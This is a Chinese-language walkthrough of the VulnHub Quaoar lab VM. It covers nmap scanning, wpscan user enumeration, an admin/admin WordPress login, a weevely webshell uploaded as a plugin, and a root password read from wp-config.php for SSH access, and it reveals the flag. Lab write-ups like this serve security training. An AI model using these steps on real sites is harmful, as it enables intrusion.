0x00 环境搭建
- 下载地址
https://download.vulnhub.com/hackfest2016/Quaoar.ova - 运行环境
Virtual Box 仅主机网络
kali 搭建同网卡 - 目标
root权限 flag文件
0x01 信息收集
-
靶机ip探测
nmap -sP 192.168.56.0/24
192.168.56.109
-
端口服务探测识别
nmap -sC -sV -A -p- 192.168.56.109 -o port.txt
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
0x02 漏洞挖掘
- 先以80 web为 入口点测试
步骤一:80端口web测试
(1)网站首页只有一张图片 没有任何功能点
(2)robots.txt 查看 目录扫描
之后就可以转为 wordpress cms漏洞利用
步骤二:wordpress cms漏洞利用
版本
(1)wpscan --url http://192.168.56.109/wordpress --wp-content-dir wp-content --enumerate u
发现两个用户 admin 和wpuser
(2)尝试登录后台
http://192.168.56.109/wordpress/wp-login.php
admin admin 弱口令登录成功
通过在插件上传木马 getshell
(1)
(2)kali 工具
weevely generate shell back.php
(3)上传后的插件都存在于 wp-content-uploads 目录
(4) kali 工具 连接木马
weevely http://192.168.56.109/wordpress/wp-content/uploads/2021/12/back.php shell
0x03 提权
步骤三:提权
(1)由于是 wordpress 先去网站根目录查看 数据库文件
wp-config.php
可能存在root密码
(2)尝试ssh登录
登录成功
MD5解密 flag为
QuaoarIsAwesome
Quaoar太棒了
0x04 总结
该靶机比较简单,利用wordpress 弱口令进入后台后,利用上传插件漏洞getshell,之后再wp-config.php 数据库配置文件中 看到个root和密码 尝试 ssh登录提权成功。